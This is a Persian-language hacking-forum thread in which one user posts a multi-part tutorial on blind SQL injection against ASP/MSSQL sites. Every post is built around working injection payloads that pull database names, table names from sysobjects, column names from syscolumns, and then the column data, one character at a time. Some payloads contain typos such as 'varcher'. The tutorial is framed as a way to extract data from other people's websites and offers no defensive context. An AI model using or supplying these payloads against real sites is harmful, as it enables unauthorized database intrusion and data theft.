discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

 با سلام خدمت شما کاربران و مدیران عزیز گارد ایران

در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . 

Blind to asp

 

 

تست اسیب پذیری : 

 

and 1=1 باید لود شود و and 1=2 نباید لود شود .

 

نام دیتابیس

 

با دستور :

 and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97

 

 

97 که با کد ascii می شود a

 و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید

یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن

همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . 

ببخشید که یک کمی طولانی شد . 

 --------- --------- --------- --------- --------- --------- --------- --------- --------- ---------

نکته : 

اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌)

 

99 ‌ true

100 > true

99 = false

 

یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت :  

 

and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99  = load

and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load

and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load

 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- 

بیرون کشیدن نام دیتابیس های بعدی : 

 

and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97

 

 

برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد .  

 

مثال : 

 

and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97

and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98

and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102

and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107

  --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- 

 

چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم . 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

با سلام خدمت دوستان عزیز در این پست همانطور که گفتم قرار است بیرون کشیدن تیبل ها را به شما آموزش دهم . 

 

بیرون کشیدن تیبل ها :

 

and isnull (ascii(substring(cast((select top 1 lower (name) from sysobjects where xtype=0x55 and name not in (select top 1  lower (name) from sysobjects where xtype=0x55))as varcher (8000)),1,1)),0)>97

 

برای حرف دوم ، عدد بنفش را یکی یکی اضافه کنید

و بقیه چیز ها هم مثل blind معمولی  است و اینکه مثلا شما امدید و تمام حرف های تیبل اول را بدست اوردید اما بدرد شما نخورد برای اینکه بروید تیبل دوم  

ان عدد بعد از top (که ابی و بولد است) را یکی یکی اضافه کنید .  

در پست بعد به شما آموزش بیرون کشیدن ستون ها رو میدم . 

دوستانی که متد blind در سایت های php بلد نیستند و یا دوست دارند تا من آموزش متد blind در سایت های php را بزارم از این پست حمایت کنند .

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

همانطور که گفتم در در این پست قصد دارم آموزش بیرون کشیدن ستون ها رو بدم . 

بیرون کشیدن ستون های یک جدول :

 

 

and isnull (ascii(substring(cast((select p.name from(select (select count  (i.colid)rid from syscolumns i where (i.colid<=o.colid)and id=(select id from sysobjects where name=’X’ ))x,name from syscolumns o where id=(select id from sysobject where  name=’X’))p where(p.x=1))  as varcher (8000)),1,1)),0)>97

 

 

در دو قسمتی که این X قرار داشت نام تیبل مهم را بنویسید و عدد ۹۷ که ابی هست یعنی نشان دهنده حروف در ستون ها می تواند کمتر ش هم کنید ( یعنی می تواند حروف بزرگ هم باشد. )

و عدد بنفش هم برای رفتن به کاراکتر بعدی هست و برای اینکه بروید ستون بعد ان عدد ۱ که بولد و سبز است را زیاد می کنید و بقیه مراحل هم مثل روش های قبل .

 

امیدوارم از این پست لذت برده باشید و در پست بعد آموزش بیرون کشیدن اطلاعات ستون ها بهتون میدم .

خوش باشید .

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

بیرون کشیدن اطلاعات ستون های یک جدول :

 

and  ascii(substring(select column from table where masir),1,1))>97

 

به جای column نام ستون مورد نظر را بنویسید و به جای table نام تیبل مهم را بنویسید و به جای masir چیز های متد GET ( به غییر از چیز هایی که خودمان نوشته ایم )یعنی مثلا id=1 و بقیه مراحل هم به همین صورت برای بیرو کشیدن حرف اول همان عدد 97 را تغییر و برای رفتن به کاراکتر بعدی همان عدد  1 همیشگی .

امیدوارم لذت برده باشید  ، ببخشید که یک زره پست بخش بخش شد در پست های بعد این مشکل رو حل می کنم. 

 

 

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری